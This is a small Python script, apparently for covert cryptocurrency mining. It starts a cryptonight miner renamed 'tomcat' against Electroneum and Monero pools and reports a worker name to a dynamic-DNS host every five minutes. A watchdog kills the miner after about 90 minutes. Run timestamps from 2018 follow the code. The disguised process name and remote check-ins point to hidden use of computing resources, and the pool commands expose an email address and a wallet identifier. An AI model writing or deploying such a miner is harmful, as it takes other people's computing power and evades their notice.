import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:04.473736
#2018-02-17 16:41:06.116399
#2018-02-17 18:27:05.976514
#2018-02-17 20:16:03.903006
#2018-02-17 22:03:06.177234
#2018-02-17 23:47:06.549163
#2018-02-18 01:37:06.915203
#2018-02-18 03:24:06.063069
#2018-02-18 05:12:01.290925
#2018-02-18 07:04:01.252923
#2018-02-18 08:52:05.157009
#2018-02-18 10:39:04.834834
#2018-02-18 12:24:04.575206
#2018-02-18 14:12:05.637546
#2018-02-18 16:02:01.252795
#2018-02-18 17:52:06.677780
#2018-02-18 19:39:05.612904
#2018-02-18 21:24:06.261471
#2018-02-18 23:13:03.468406
#2018-02-19 00:59:01.655270
#2018-02-19 02:47:03.805915
#2018-02-19 04:33:05.549493
#2018-02-19 06:18:07.191356
#2018-02-19 08:07:05.190329
#2018-02-19 09:57:07.735190
#2018-02-19 11:47:03.880236
#2018-02-19 13:33:08.200592
#2018-02-19 15:21:07.314076
#2018-02-19 17:09:09.237984
#2018-02-19 18:54:08.493388
#2018-02-19 20:34:01.325905
#2018-02-19 22:21:07.293749
#2018-02-20 00:08:01.620306
#2018-02-20 01:54:07.448973
#2018-02-20 03:42:07.732568
#2018-02-20 05:29:01.796900
#2018-02-20 07:13:05.205047
#2018-02-20 08:59:05.937278
#2018-02-20 10:43:05.185620
#2018-02-20 12:28:08.627890
#2018-02-20 14:16:08.989130
#2018-02-20 15:59:05.423349
#2018-02-20 17:46:09.039854
#2018-02-20 19:37:09.013370
#2018-02-20 21:24:08.527217
#2018-02-20 23:08:03.490645
#2018-02-21 00:52:06.675042
#2018-02-21 02:39:04.376748
#2018-02-21 04:28:04.760581
#2018-02-21 06:17:06.513806
#2018-02-21 08:03:01.700954
#2018-02-21 09:49:04.109935
#2018-02-21 11:38:09.538365
#2018-02-21 13:28:06.878628
#2018-02-21 15:13:08.147767
#2018-02-21 17:04:04.831153
#2018-02-21 18:52:07.410765
#2018-02-21 20:41:01.820937
#2018-02-21 22:26:05.505482
#2018-02-22 00:15:08.984973
#2018-02-22 02:03:04.846813
#2018-02-22 03:49:05.749641
#2018-02-22 05:36:05.301417
#2018-02-22 07:21:08.395213
#2018-02-22 09:09:01.631657
#2018-02-22 10:56:10.059448
#2018-02-22 12:41:06.571375
#2018-02-22 14:27:08.461847
#2018-02-22 16:13:01.398454
#2018-02-22 17:58:02.068947
#2018-02-22 19:46:08.772165
#2018-02-22 21:36:07.469730
#2018-02-22 23:23:06.489980
#2018-02-23 01:11:05.914846
#2018-02-23 02:58:07.519362
#2018-02-23 04:45:05.452570
#2018-02-23 06:34:06.176306
#2018-02-23 08:21:06.526620
#2018-02-23 10:37:06.846869
#2018-02-23 12:29:08.994800
#2018-02-23 14:16:07.427544
#2018-02-23 16:08:01.680356
#2018-02-23 17:54:04.479002
#2018-02-23 19:39:06.728578
#2018-02-23 21:23:03.993509
#2018-02-23 23:10:04.115252
#2018-02-24 00:51:01.456904
#2018-02-24 02:41:05.692665
#2018-02-24 04:35:05.769889
#2018-02-24 06:20:01.406712
#2018-02-24 08:08:01.249921
#2018-02-24 09:52:07.560144
#2018-02-24 11:47:01.655570
#2018-02-24 13:38:03.385453
#2018-02-24 15:25:07.785902
#2018-02-24 17:14:06.275045
#2018-02-24 19:06:05.387206
#2018-02-24 20:55:06.082208
#2018-02-24 23:21:01.895167
#2018-02-25 03:25:05.714670
#2018-02-25 07:22:04.624372